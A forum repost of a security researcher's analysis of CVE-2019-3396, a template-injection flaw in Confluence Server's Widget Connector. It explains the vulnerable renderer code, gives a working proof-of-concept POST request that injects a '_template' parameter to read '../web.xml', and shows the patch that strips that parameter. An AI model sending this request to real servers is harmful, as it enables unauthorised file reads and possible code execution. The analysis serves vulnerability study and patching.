Jump to content
Nytro

[CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

Recommended Posts

【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

发表于 2019-04-06 | 分类于 Web Security | 阅读次数 1141

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

1.jpg?raw=true

Analysis

According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height.

2.png?raw=true

the Widget Connector has defind some renders. for example the FriendFeedRenderer:


 
public class FriendFeedRenderer implements WidgetRenderer
{
...
 
public String getEmbeddedHtml(String url, Map<String, String> params) {
params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
return this.velocityRenderService.render(getEmbedUrl(url), params);
}
}

 

In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map.

However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly
3.png?raw=true

So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render

4.png?raw=true

Reproduce


 
POST /rest/tinymce/1/macro/preview HTTP/1.1
 
{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

5.jpg

Patch

in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this:


 
public class WidgetMacro
extends BaseMacro
implements Macro, EditorImagePlaceholder
{
public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
{
...
this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
}
 
...
 
public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
...
doSanitizeParameters(parameters);
 
return this.renderManager.getEmbeddedHtml(url, parameters);
}
 
private void doSanitizeParameters(Map<String, String> parameters)
{
Objects.requireNonNull(parameters);
for (String sanitizedParameter : this.sanitizeFields) {
parameters.remove(sanitizedParameter);
}
}
}

 

 
点击赞赏二维码,您的支持将鼓励我继续创作!

Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...